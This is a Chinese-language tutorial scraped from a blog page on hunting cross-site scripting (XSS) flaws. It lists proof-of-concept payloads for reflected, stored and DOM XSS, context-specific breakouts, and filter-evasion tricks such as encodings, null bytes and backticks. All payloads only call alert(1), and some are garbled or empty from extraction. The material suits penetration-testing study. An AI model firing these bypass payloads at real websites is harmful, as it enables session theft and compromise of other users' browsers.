XSS漏洞挖掘

写在前面

文章内容参考自
https://twosecurity.io/
http://www.4hou.com/web/15212.html
等
文章主体来自https://twosecurity.io/的付费内容，并根据作者的基础进行了一定的增删，希望获取全部内容的读者可以前去支持。
文章的部分内容搬运自不同的博文，由于这篇文章总结梳理时间较长，遗忘了大部分网络资源的地址，如果你发现文章内容搬运自你的博客，请留言联系我。

一、XSS漏洞

常用测试payload

"'>


二、XSS的分类
反射型 XSS 漏洞的挖掘
（反射型XSS测试PAYLAOD）
a: ?name=amber&age=1
b: ?name=amber&age=

在网页源码中查找 amber并查看h1的 <是否被转义
< >符号未被转义则将参数转换成svg
payload的进一步构造
若存在源码中再添加内联事件执行语句

onload是指在加载该页面时就执行，然后观察是否有弹窗。
存储型 XSS 漏洞的挖掘
存储型XSS简单分类






存储型XSS分类


操作步骤
在 burpsuite 的 intercepter 模块下，点击「 Intercepter is off 」按钮开启请求拦截 ——>在网站可输入处写入 XXXXX 的字符串——>查看拦截请求，将XXXXX字符串替换为payload
替换的payload
click
Data URI，仅限 Firefox 下可以利用：
click
JS URI：


存储型XSS挖掘总结






存储型XSS挖掘总结


DOM XSS 漏洞的挖掘
与普通XSS不同的是，DOM XSS是在浏览器的解析中改变页面DOM树，且恶意代码并不在返回页面源码中回显，这使我们无法通过特征匹配来检测DOM XSS。


触发XSS的一种方式如下:
 http://www.foo.com/xss.html#alert(1)
 这个URL显然不会发送到服务端，仅仅是在客户端被接收并解析执行
页面跳转
页面跳转中常用的三种方式：
1）302跳转

2）Meta标签跳转

3）通过JS跳转，使用location.href、location.replace()、location.assign()。

在页面跳转时，如果使用第三种方式跳转，那么就可以通过javascript伪协议执行JS脚本。
 注意前两种跳转方式是无法执行的。
 所以在页面跳转时针对跳转URL要做检测，否则就容易造成XSS。
例如：


payload:http://192.168.192.120/1.html?url=javascript:alert(1)
取值写入页面或动态执行
接受用户输入，并通过DOM操作写入到当前页面中或者动态执行，也可以触发XSS




    test
    html
    



DOM XSS输入点









Location
当前网页的URL地址


window.name
当前网页 tab 的名字，它被不同的网站赋值，也就是说这个网页为window.name 赋值后再跳转到其它网站，window.name 的值依然不变


document.title
是当前网页的标题，可以在搜索框输入控制它的内容


document.referer
表示来路，表示从哪个网页URL访问过来的


postMessage
是HTML5 的一种跨域机制，但很多时候开发者没有正确的做来源检测，会导致 DOM XSS 的发生


location
它触发 JS 通常是以跳转到 JS URI 的方式执行


eval
是JS 内置的动态JS执行器


innerHTML
能为一个网页元素赋值


document.write
可以输出一个页面流


Function
能通过函数生成一个函数，可以传入动态JS代码


setTimeout
会延时执行JS代码


setInterval
表示循环执行 JS 代码



闭合问题
引号，尖括号闭合说明
举例
假设输入框源码：
其中value中的[?]是可输入部分
payload1:
value=" "autofocus/onfocus=alert(1)//">

autofocus：对象在加载完成后自动获得焦点
 onfocus：事件在对象获得焦点时发生
 第一个引号用于和value中的前一个引号闭合，结尾的//用于注释后面的语句，这样使得xss能被浏览器完整的解析
 value=" "autofocus/onfocus=alert(1)//" "
payload2:
value=" ">
第一个引号和用于和value中的前一个引号闭合，>用于和input左边的<闭合，<用于和结尾处的>闭合
 
HTML标签下的情况
HTML标签下的XSS是一种最常见的情况，例如：



HTML Context


{{用户输入}}



可以使用以下payloads:




</code></pre> 
 <p>为了注入JS代码成功，我们需要闭合前面的HTML标签，然后使用<code><svg onload=alert(1)//</code> 类似payload 就可以成功XSS。</p> 
 <p>但是有些html标签中不执行js代码，例如：<code><title>, <textarea >,<xmp></code>都需要使用<code></title><script>alert(1)</script></code> 先闭合标签，再插入JS代码。</p> 
 <h3>HTML属性下的情况</h3> 
 <p>用户的输入是在HTML 标签的属性当中的时候，怎么来执行JS 代码。会有三种情况：</p> 
 <ul> 
  <li>双引号</li> 
  <li>单引号</li> 
  <li>无引号</li> 
 </ul> 
 <pre><code class="html"><!DOCTYPE HTML>
<html>
<head>
<title></title>
</head>
<body>
.....
...
<input type="" name="input" value="{{用户输入}}"> <!-- 双引号 -->
<input type="" name="input" value='{{用户输入}}'> <!-- 单引号 -->
<input type="" name="input" value={{用户输入}}> <!-- 无引号 -->
...
....
</body>
</html>
</code></pre> 
 <ol> 
  <li>双引号payloads:</li> 
 </ol> 
 <pre><code class="html">"autofocus onfocus="alert(1)
"autofocus onfocus=alert(1)//
"onbeforescriptexecute=alert(1)//
"onmouseover="alert(1)//
"autofocus onblur="alert(1)
</code></pre> 
 <ol start="2"> 
  <li>单引号payloads:</li> 
 </ol> 
 <pre><code class="html">'autofocus onfocus='alert(1)
'autofocus onfocus=alert(1)//
'onbeforescriptexecute=alert(1)//
'onmouseover='alert(1)//
'autofocus onblur='alert(1)
</code></pre> 
 <ol start="3"> 
  <li>无引号payloads:</li> 
 </ol> 
 <pre><code class="html">autofocus onfocus=alert(1)//
onbeforescriptexecute=alert(1)//
onmouseover=alert(1)//
</code></pre> 
 <ol start="4"> 
  <li>hidden 标签:</li> 
 </ol> 
 <p>1)再onclick时间下，使用accesskey</p> 
 <pre><code class="html"><!DOCTYPE HTML>
<html>
..
<input type="hidden" value="{{用户输入}}" />
..
</html>
</code></pre> 
 <p>Payload: <code>"accesskey="X" onclick="alert(1)"</code> ，为了触发事件，需要按Alt+X 键。</p> 
 <h3>URL下的情况</h3> 
 <p>使用了加载URL的标签</p> 
 <pre><code class="html"><script src="{{用户输入}}"></script>

<a href="{{用户输入}}">Click</a>

<iframe src="{{用户输入}}" />

<base href="{{用户输入}}">

<form action={{用户输入}}>
<button>X</button>

<frameset><frame src="{{用户输入}}"></frameset>
</code></pre> 
 <p>Payload: <code>javascript:alert(1)//</code></p> 
 <h3>Script标签下的情况</h3> 
 <p>用户的输入在<code><script></code> 标签中，从而导致的JS代码执行。</p> 
 <ol> 
  <li> </li> 
 </ol> 
 <pre><code class="html"><!DOCTYPE HTML>
<html>
..
<script>
var x="{{用户输入}}";
..
...
</script>
..
</html>
</code></pre> 
 <p>Payloads:</p> 
 <pre><code class="html">";alert(1)//
"-alert(1)-"
"+alert(1)+"
"*alert(1)*"
</code></pre> 
 <ol start="2"> 
  <li> </li> 
 </ol> 
 <pre><code class="html"><!DOCTYPE HTML>
<html>
..
<script>
var x=123;
function test(){
    if(test =='{{用户输入}}'){
        //something
    }
    else
    {
    //something
    }
}
test();
</script>
..
</html>
</code></pre> 
 <p>首先用 <code>test'){//</code> 封闭条件判断的地方，变成：</p> 
 <pre><code class="javascript">function test(){
    if(test =='test'){//'){
    //something
    }
    else
    {
    //something
    }
}
</code></pre> 
 <p>但是这样只有在调用test()才能执行，所以我们要跳出这个函数输入：<code>test'){1}}//</code> 封闭test()函数：</p> 
 <pre><code class="javascript">function test(){
    if(test =='test'){1}}//'){
    //something
    }
    else
    {
    //something
    }
}
</code></pre> 
 <p>我们在使用<code>test'){1}};alert(1);function test1(){ if(1){//</code> 把对应的test位置替换下，利用test1 来封闭剩下的函数，但是这样执行会有错误，我们使用ES6的箭头函数来替代<code>function</code> :</p> 
 <pre><code class="javascript">function test(){
    if(test =='test'){1}};alert(1);test1=>{ if(1){//'){1}}//'){
    //something
    }
    else
    {
    //something
    }
}
</code></pre> 
 <p><strong>未设置过滤情况下利用script进行闭合</strong></p> 
 <pre><code class="php+HTML"><script>var website="http://www.xxx.com/"</script><script>alert(1)//";</script>
</code></pre> 
 <p><strong>双引号绕过<code><</code>过滤</strong></p> 
 <pre><code class="php+HTML"><script>var website="http://www.xxx.com/"-alert(1)//";</script>
</code></pre> 
 <p>-alert(1)/" 中的减号的意思：让 js 语句不发生错误 ('+'，在 url 的 uqery 中是空格的编码，而 % 号是表示url编码的标识符，/号在url中是表示一个path，所以用减号最合适。)</p> 
 <p><strong>使用换行符跳过注释</strong></p> 
 <pre><code class="php+HTML"><script>//var website="http://www.xxx.com/
    alert(1)//";</script>
</code></pre> 
 <p>**多行注释绕过 **</p> 
 <pre><code class="php+HTML"><script>/*var website="http://www.xxx.com/ */alert(1)//"; */</script>
</code></pre> 
 <p><strong>利用HTML编码闭合单引号</strong></p> 
 <p>在 HTML 编码中，单引号对应的有 命名编码：<code>&apos;</code> 、十进制编码：<code>&#39;</code>、十六进制编码：<code>&#x27;</code></p> 
 <h2>XSS 漏洞挖掘总结</h2> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 616px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption">
    XSS挖掘 
  </div> 
 </div> 
 <h1>三、混淆和绕过</h1> 
 <h2>基本变形</h2> 
 <p>最简单的测试XSS的payload</p> 
 <pre><code class="javascript"><script>alert(1)</script>
</code></pre> 
 <p>如果测试的参数存在XSS，就会弹窗显示1</p> 
 <p>这个payload肯定会被过过滤，可以对payload进行简单修改，绕过默认的filter。</p> 
 <pre><code class="javascript">在script标签钟插入一个空格或者是tab
<script >alert(1)</script>
<script    >alert(1)</script>

也可以对tab，换行，回车进行编码来绕过
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>

对标签进行大小写
<ScRipT>alert(1)</sCriPt>

插入null字节，在xss payload的任何地方插入null字节，有时候可以绕过filter
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
</code></pre> 
 <h2>事件属性</h2> 
 <pre><code class="javascript"><input autofocus onfocus=alert(1)> 
<input onblur=alert(1) autofocus><input autofocus> 
<body onscroll=alert(1)><br><br>...<br><input autofocus>
</code></pre> 
 <table> 
  <thead> 
   <tr> 
    <th><strong>Reference(十进制Unicode)</strong></th> 
    <th><strong>Chrome浏览器(对应的空白分隔符)</strong></th> 
    <th><strong>Edge浏览器(对应的空白分隔符)</strong></th> 
    <th><strong>IE浏览器(对应的空白分隔符)</strong></th> 
   </tr> 
  </thead> 
  <tbody> 
   <tr> 
    <td>属性中支持反引号</td> 
    <td>不支持</td> 
    <td>不支持</td> 
    <td>IE >= 10 docmode: 不支持 IE < 10 docmode: 支持</td> 
   </tr> 
   <tr> 
    <td>标签名称中的空白分隔符(e.g. []src="javascript:alert(1)">)</td> 
    <td>9,10,12,13, 32,47</td> 
    <td>9,10,12,13,32,47</td> 
    <td>IE < 10 docmode:9, 10,11,12,13,32,47 IE >= 10 docmode:9, 10,12,13,32,47</td> 
   </tr> 
   <tr> 
    <td>属性中的空白分隔符 (e.g.<iframe[]src[]= []"javascript:alert(1)">)</td> 
    <td>9,10,12,13, 32</td> 
    <td>9,10,12,13,32</td> 
    <td>IE < 10 docmode:0 ,9, 10,11,12,13,32,47 IE >= 10 docmode:9, 10,12,13,32</td> 
   </tr> 
   <tr> 
    <td>JavaScript中的空白分隔符</td> 
    <td>9-13,32, 160,5760, 8192-8202, 8232,8233, 8239,8287, 12288,65279, 65534</td> 
    <td>在附录中能找到Edge所支持的字符</td> 
    <td>9-13,32,160,5760, 6158,8192-8202, 8232,8233,8239, 8287,12288,65279</td> 
   </tr> 
   <tr> 
    <td>URL中的空白分隔符 (e.g.<iframe src="[]javascript:alert(1)">)</td> 
    <td>9,10,13,32</td> 
    <td>9,10,13,32</td> 
    <td>1-7,9,10,11,12,13, 32</td> 
   </tr> 
   <tr> 
    <td>CSS中的空白分隔符</td> 
    <td>9,10,12,13, 32</td> 
    <td>9,10,12,13,32</td> 
    <td>IE < 10 docmode:9, 10,11,12,13,32,160, 8192-8203,12288, 65279 IE >= 10 docmode:9, 10,12,13,32</td> 
   </tr> 
  </tbody> 
 </table> 
 <blockquote> 
  <p>打开Chrome控制台->Console，输入String.fromCharCode(9),即复制到9所对应的字符</p> 
 </blockquote> 
 <h2>分隔符和括号</h2> 
 <p>分隔符是用于分隔文本字符串或者其他数据流的一个或多个字符。在挖xss漏洞时，巧妙的使用分隔符非常有效。在HTML中，我们经常使用空格来分隔属性和它的值。还有的时候，只要使用一个单引号或者双引号作为分隔符就可以绕过filter了，如下：</p> 
 <pre><code class="javascript"><img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>

对分隔符进行编码也可以用来绕过防御
<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>

</code></pre> 
 <p>反引号也是绕过filter的一种不错的技巧</p> 
 <pre><code class="javascript"><img onerror=`alert(1)`src=x>
编码版本如下：
<img onerror=&#96alert(1)&#96src=x>
</code></pre> 
 <p>Filter有时候会过滤某些关键词，比如以“on”开头的事件处理器，以此来防御此类xss攻击。</p> 
 <p>如果我们把属性的位置换到前面，filter无法识别反引号，会将它视为不是以“on”开头的单独的属性，这样也就可以有效绕过filter了，如下：</p> 
 <pre><code class="javascript"><img src=`x`onerror=alert(1)>
</code></pre> 
 <p>跟分隔符一样，尖括号也可以利用来绕过filter。在某些情况下，filter仅仅只会查找开始括号和闭合括号，然后将尖括号里面的内容与恶意标签黑名单比较。通过使用多个尖括号，有时候可以骗过filter接受后面的代码。再使用双斜线注释掉后面的闭合标签，所以也不会报错，如下：</p> 
 <pre><code class="javascript"><<script>alert(1)//<</script>

还有时候在结束的地方使用开尖括号也有可能绕过filter
<input onsubmit=alert(1)<
</code></pre> 
 <h2>标签名分隔符</h2> 
 <pre><code class="javascript"><img/onerror=alert(1) src=a>
<img[0x09]onerror=alert(1) src=a>
<img[0x0d]onerror=alert(1) src=a>
<img[0x0a]onerror=alert(1) src=a>
<img/"onerror=alert(1) src=a>
<img/'onerror=alert(1) src=a>
<img/anyjunk/onerror=alert(a) src=a>
</code></pre> 
 <p>（字符引用解析）</p> 
 <table> 
  <thead> 
   <tr> 
    <th><strong>Reference</strong></th> 
    <th><strong>Chrome浏览器</strong></th> 
    <th><strong>Edge浏览器</strong></th> 
    <th><strong>IE浏览器</strong></th> 
   </tr> 
  </thead> 
  <tbody> 
   <tr> 
    <td>十进制数字字符引用的最大长度 (e.g.&x00000060;)</td> 
    <td><strong>无限</strong></td> 
    <td><strong>无限</strong></td> 
    <td>IE >= 9 docmode: 无限IE < 9 docmode: 7;一旦超出限制会被?符代替</td> 
   </tr> 
   <tr> 
    <td>八进制数字字符引用的最大长度 (e.g. <)</td> 
    <td><strong>无限</strong></td> 
    <td><strong>无限</strong></td> 
    <td>IE >= 9 docmode: 无限IE < 9 docmode: 6;一旦超出限制会被?符代替</td> 
   </tr> 
   <tr> 
    <td>HTML5字符实体支持</td> 
    <td><strong>支持</strong></td> 
    <td><strong>支持</strong></td> 
    <td>IE >= 10 docmode: 支持IE < 10 docmode: 不支持</td> 
   </tr> 
   <tr> 
    <td>在某些情况下可以选择忽略分号 (e.g.<p>&#97</p>, <input value="&#97">)</td> 
    <td><strong>支持</strong></td> 
    <td><strong>支持</strong></td> 
    <td>IE >= 9 docmode: 支持IE < 9 docmode: 支持 除了十六进制数字字符引用</td> 
   </tr> 
  </tbody> 
 </table> 
 <h2>JS编码</h2> 
 <pre><code class="javascript">a\u006cert（1）;
alert`1`;
location=/javascript:alert%281%29/.source;
</code></pre> 
 <h2>HTML编码</h2> 
 <pre><code class="javascript"><a href="javascsipt:alert(1)">click</a>
</code></pre> 
 <blockquote> 
  <p>备注：CSP策略</p> 
  <p>在挖掘过程中可能会遇到使用CSP策略禁止网站弹出JavaScript警告窗口的情况。<br> CSP：Content-Security-Policy(内容安全策略)，以白名单的机制对网站加载或执行的资源起作用。通过CSP所约束的的规责指定可信的内容来源（这里的内容可以指脚本、图片、iframe、fton、style等等可能的远程的资源）。通过CSP协定，让WEB处于一个安全的运行环境中。</p> 
 </blockquote> 
 <h1>四、漏洞利用</h1> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 602px; max-height: 537px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption">
    img 
  </div> 
 </div> 
 <h2>HTTPOnly Cookies</h2> 
 <blockquote> 
  <p>HttpOnly属性介绍:</p> 
  <p>Cookie的HttpOnly属性是Cookie的扩展功能，它使JavaScript脚本无法获得Cookie。其主要目的是为了防止XSS对Cookie的信息窃取。</p> 
 </blockquote> 
 <blockquote> 
  <p>发送指定HttpOnly属性的Cookie的方法如下：</p> 
  <p>Set-Cookie: name=value; HttpOnly</p> 
  <p>通过上述设置，通常从Web页面内还可以对Cookie进行读取操作。但使用JavaScript的doucment.cookie就无法读取附加HttpOnly属性后的Cookie内容了。</p> 
 </blockquote> 
 <h2>利用过程</h2> 
 <p>（以下图片展示了攻击者的XSS漏洞利用流程）</p> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 623px; max-height: 546px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption">
    img 
  </div> 
 </div> 
</article>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1621346225569693696"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(XSS漏洞挖掘)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1835065923262836736.htm"
                           title="【网络安全】漏洞挖掘：php代码审计" target="_blank">【网络安全】漏洞挖掘：php代码审计</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
                        <div>未经许可，不得转载。文章目录正文正文在应用程序中，通过一个JavaScript注释发现了一个备份ZIP文件。解压后，获取了应用程序的代码，其中包含如下代码片段：代码首先检查变量$action是否等于'convert'，如果是，则继续执行。随后对传入的变量$data使用trim()函数去除两端空白字符，并使用eval()函数执行$data的内容。显然，代码对$data没有进行任何过滤或验证，因此可以</div>
                    </li>
                    <li><a href="/article/1834925081566998528.htm"
                           title="Prism 教程" target="_blank">Prism 教程</a>
                        <span class="text-muted">yang_B621</span>
<a class="tag" taget="_blank" href="/search/Prism/1.htm">Prism</a><a class="tag" taget="_blank" href="/search/IOC/1.htm">IOC</a>
                        <div>http://t.csdnimg.cn/VXSSvhttps://blog.csdn.net/u010476739/article/details/119341731Prism-随笔分类-Hello——寻梦者！-博客园(cnblogs.com)C#IoC学习笔记-缥缈的尘埃-博客园(cnblogs.com)WPF_SchuylerEX的博客-CSDN博客</div>
                    </li>
                    <li><a href="/article/1834909327081697280.htm"
                           title="Apache POI用法" target="_blank">Apache POI用法</a>
                        <span class="text-muted">JH3073</span>
<a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
                        <div>一、ApachePOI是什么ApachePOI是用Java编写的免费开源的跨平台的JavaAPI，ApachePOI提供API给Java程序对MicrosoftOffice格式档案读和写的功能，其中使用最多的就是使用POI操作Excel文件。二、POI结构HSSF－提供读写MicrosoftExcelXLS格式档案的功能XSSF－提供读写MicrosoftExcelOOXMLXLSX格式档案的功能</div>
                    </li>
                    <li><a href="/article/1834512894985859072.htm"
                           title="【网络安全】漏洞挖掘之CVE-2019-9670+检测工具" target="_blank">【网络安全】漏洞挖掘之CVE-2019-9670+检测工具</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a><a class="tag" taget="_blank" href="/search/CVE/1.htm">CVE</a>
                        <div>未经许可，不得转载。文章目录漏洞介绍正文工具漏洞介绍CVE-2019-9670是一个与ZimbraCollaborationSuite(ZCS)相关的严重漏洞。ZCS中的AutoDiscover服务存在不正确的XML解析处理，该漏洞可被利用来注入恶意XML代码（例如外部实体注入（XXE）攻击），从而导致服务器任意文件读取或远程代码执行(RCE)。Zimbra]><Autodiscoverxmlns</div>
                    </li>
                    <li><a href="/article/1834080024043548672.htm"
                           title="最新网络安全（黑客）——自学篇" target="_blank">最新网络安全（黑客）——自学篇</a>
                        <span class="text-muted">黑客小雨</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>*需要的小伙伴关注我第一阶段：基础操作入门，学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍，一般来说这个过程在1个月左右比较合适。在这个阶段，你已经对网络安全有了基本的了解。如果你学完了第一步，相信你已经在理论上明白了上面是sql注入，什么是xss攻击，对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基！所谓的“打地基”其实就是系统化的</div>
                    </li>
                    <li><a href="/article/1833830664764485632.htm"
                           title="微信小程序入门【三】：实现简单登录退出和个人信息页面" target="_blank">微信小程序入门【三】：实现简单登录退出和个人信息页面</a>
                        <span class="text-muted">山岫</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>效果图预览这个框很是惆怅，但是真机调试没出现过，这个bug下次再解决吧。这次说说登录。效果图：附上代码：home.wxml-->-->-->-->Hi游客{{userInfo.nickName}}-->退出登录@技术支持：江阔jk921home.wxss/*pages/scroll/scroll.wxss*/.top{width:100%;height:400rpx;background-colo</div>
                    </li>
                    <li><a href="/article/1833830286404710400.htm"
                           title="Web应用防火墙" target="_blank">Web应用防火墙</a>
                        <span class="text-muted">Smile灬凉城666</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/WAF/1.htm">WAF</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>一、定义与目的WAF是一种特殊类型的防火墙，专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS（跨站脚本）、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层，即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说，WAF会解析进入Web应用的HTTP/HTTPS请求</div>
                    </li>
                    <li><a href="/article/1833821079899041792.htm"
                           title="如何识别和防范跨站脚本攻击（XSS）？" target="_blank">如何识别和防范跨站脚本攻击（XSS）？</a>
                        <span class="text-muted">盼盼盼</span>
<a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>识别和防范跨站脚本攻击（XSS）需要一系列的措施，包括输入验证、输出编码、安全配置和用户教育。以下是一些关键步骤：识别XSS异常行为：观察网站行为是否异常，例如页面上突然出现未经预期的内容或功能。错误消息：检查错误消息中是否包含敏感信息，这可能是由于未经过滤的输入导致的。安全工具：使用浏览器插件或安全扫描工具来检测潜在的XSS漏洞。代码审计：定期进行代码审计，查找可能的安全漏洞，特别是在处理用户输</div>
                    </li>
                    <li><a href="/article/1833713785567801344.htm"
                           title="【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF" target="_blank">【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
                        <div>未经许可，不得转载。文章目录空字节URL回调XSSSQL空字节\0，也称为null字节，是一个值为零的特殊字符。在编程中，通常用来表示字符串的结束。攻击者可以利用null字节注入来绕过一些验证或过滤机制。以下三个漏洞，空字节功不可没。URL回调密码重置功能，发起请求后，邮箱会收到链接。请求包中存在callbackUrl参数：在参数中添加/test，发包后，邮箱中的链接为https://compan</div>
                    </li>
                    <li><a href="/article/1833586323164852224.htm"
                           title="【漏洞挖掘】——53、 WebSocket安全概览" target="_blank">【漏洞挖掘】——53、 WebSocket安全概览</a>
                        <span class="text-muted">FLy_鹏程万里</span>
<a class="tag" taget="_blank" href="/search/%E3%80%90WEB%E6%B8%97%E9%80%8F%E3%80%91/1.htm">【WEB渗透】</a><a class="tag" taget="_blank" href="/search/websocket/1.htm">websocket</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E6%B8%97%E9%80%8F/1.htm">web渗透</a>
                        <div>文章前言在一次做项目的时候本来是想去点击Burpsuite的Proxy界面的HTTPHistory选项卡来查看HTTP历史请求记录信息并做测试的，但是在查看的时候却下意识的点击到了HTTPProxy右侧的"WebSocketsHistory"选项卡中，从界面的交互历史中发现网站有使用WebSocket进行通信，虽然之前有对Websocket有一些简单的了解(比如:跨越问题)，但是未对此进行深入研究</div>
                    </li>
                    <li><a href="/article/1833581406165495808.htm"
                           title="【网络安全】漏洞挖掘之会话管理缺陷" target="_blank">【网络安全】漏洞挖掘之会话管理缺陷</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a><a class="tag" taget="_blank" href="/search/%E4%BC%9A%E8%AF%9D%E7%AE%A1%E7%90%86/1.htm">会话管理</a>
                        <div>未经许可，不得转载。文章目录正文正文目标：example.com该站点允许存在主要邮箱和次要邮箱。在尝试使用次要邮箱和密码登录时，由于账户最初是通过主邮箱创建的，无法登录。于是，我通过次要邮箱使用GoogleOAuth进行登录。令人意外的是，我成功通过GoogleOAuth登录了该账户。接着，我在两个浏览器上登录了同一个账户：Chrome浏览器使用主邮箱（attacker1@gmail.com）和</div>
                    </li>
                    <li><a href="/article/1833514971900768256.htm"
                           title="Java Web安全与Spring Config对象实战" target="_blank">Java Web安全与Spring Config对象实战</a>
                        <span class="text-muted">福建低调</span>

                        <div>本文还有配套的精品资源，点击获取简介：本课程深入探讨JavaWeb开发中的安全实践，包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时，介绍SpringSecurity框架的应用，以及Config对象在Spring配置管理中的作用，包括依赖注入和外部化配置。课程还包括实战演练，通过设置安全环境和安全漏洞模拟，帮助开发者提升应用的安全性和故障排查能力。1.Web安全</div>
                    </li>
                    <li><a href="/article/1833395689711824896.htm"
                           title="【网络安全】URL解析器混淆绕过CSP实现XSS" target="_blank">【网络安全】URL解析器混淆绕过CSP实现XSS</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
                        <div>未经许可，不得转载。文章目录前言正文前言许多流行的静态网站生成器都存在图像CDN功能，它们通过优化网站中的图像来加快页面加载速度。例如：1、OptimizingImages|Next.js利用内置的next/image组件优化图像（nextjs.org）2、NuxtImage:Nuxt应用的图像优化即插即用的图像优化功能，使用内置优化器对图像进行调整（image.nuxt.com）这些工具的目标都</div>
                    </li>
                    <li><a href="/article/1833313892722372608.htm"
